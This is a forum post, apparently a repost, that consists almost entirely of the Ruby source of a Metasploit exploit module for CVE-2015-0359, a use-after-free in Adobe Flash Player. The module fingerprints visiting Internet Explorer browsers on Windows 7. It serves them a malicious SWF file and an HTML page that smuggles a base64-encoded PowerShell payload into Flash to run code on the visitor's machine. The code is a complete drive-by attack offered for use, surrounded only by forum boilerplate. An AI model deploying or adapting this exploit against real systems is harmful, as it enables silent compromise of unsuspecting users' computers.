Jump to content
Aerosol

Adobe Flash Player domainMemory ByteArray Use After Free

Recommended Posts

Posted

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::Powershell
include Msf::Exploit::Remote::BrowserExploitServer

def initialize(info={})
super(update_info(info,
'Name' => 'Adobe Flash Player domainMemory ByteArray Use After Free',
'Description' => %q{
This module exploits a use-after-free vulnerability in Adobe Flash Player. The
vulnerability occurs when the ByteArray assigned to the current ApplicationDomain
is freed from an ActionScript worker, when forcing a reallocation by copying more
contents than the original capacity, but Flash forgets to update the domainMemory
pointer, leading to a use-after-free situation when the main worker references the
domainMemory again. This module has been tested successfully on Windows 7 SP1
(32-bit), IE 8 and IE11 with Flash 17.0.0.134.
},
'License' => MSF_LICENSE,
'Author' =>
[
'bilou', # Vulnerability discovery according to Flash Advisory
'Unknown', # Exploit in the wild
'hdarwin', # @hdarwin89 / public exploit (msf module is based on this one)
'juan vazquez' # msf module
],
'References' =>
[
['CVE', '2015-0359'],
['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-06.html'],
['URL', 'https://www.fireeye.com/blog/threat-research/2015/04/angler_ek_exploiting.html'],
['URL', 'http://malware.dontneedcoffee.com/2015/04/cve-2015-0359-flash-up-to-1700134-and.html'],
['URL', 'https://git.hacklab.kr/snippets/13'],
['URL', 'http://pastebin.com/Wj3NViUu']
],
'Payload' =>
{
'DisableNops' => true
},
'Platform' => 'win',
'BrowserRequirements' =>
{
:source => /script|headers/i,
:os_name => OperatingSystems::Match::WINDOWS_7,
:ua_name => Msf::HttpClients::IE,
:flash => lambda { |ver| ver =~ /^17\./ && Gem::Version.new(ver) <= Gem::Version.new('17.0.0.134') },
:arch => ARCH_X86
},
'Targets' =>
[
[ 'Automatic', {} ]
],
'Privileged' => false,
'DisclosureDate' => 'Apr 14 2014',
'DefaultTarget' => 0))
end

def exploit
@swf = create_swf
super
end

def on_request_exploit(cli, request, target_info)
print_status("Request: #{request.uri}")

if request.uri =~ /\.swf$/
print_status('Sending SWF...')
send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
return
end

print_status('Sending HTML...')
send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
end

def exploit_template(cli, target_info)
swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
target_payload = get_payload(cli, target_info)
psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
b64_payload = Rex::Text.encode_base64(psh_payload)

html_template = %Q|<html>
<body>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
<param name="movie" value="<%=swf_random%>" />
<param name="allowScriptAccess" value="always" />
<param name="FlashVars" value="sh=<%=b64_payload%>" />
<param name="Play" value="true" />
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>" Play="true"/>
</object>
</body>
</html>
|

return html_template, binding()
end

def create_swf
path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0359', 'msf.swf')
swf = ::File.open(path, 'rb') { |f| swf = f.read }

swf
end

end

Source

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...